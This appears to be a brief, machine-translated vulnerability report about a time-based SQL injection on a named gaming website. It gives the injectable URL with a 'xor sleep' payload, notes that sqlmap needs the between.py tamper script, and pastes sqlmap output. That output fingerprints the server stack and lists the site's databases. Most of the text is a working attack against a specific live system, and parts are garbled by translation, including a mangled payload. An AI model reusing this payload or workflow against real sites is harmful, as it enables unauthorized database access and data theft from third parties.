A pseudo-static SQL Injection on a video game Bus
A pseudo-static injection on a video game Bus
Http://yxsg.tgbus.com: 80/db/jineng/309 xor sleep(52.16.shtml
Sqlmap needs to use between. py
[21:44:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[21:44:52] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: MySQL 5[21:44:52] [INFO] fetching database names[21:44:52] [INFO] fetching number of databases[21:44:52] [INFO] resumed: 2[21:44:52] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [21:45:14] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)sqlmap got a 302 redirect to 'http://yxsg.tgbus.com:80/'. Do you want to follow? [Y/n] n[21:45:28] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors information_[21:56:13] [ERROR] invalid character detected. retrying..schema[22:00:45] [ERROR] invalid character detected. retrying..[22:00:46] [INFO] retrieved: mmo2_gamedb[22:09:11] [ERROR] invalid character detected. retrying..available databases [2]:[*] information_schema[*] mmo2_gamedb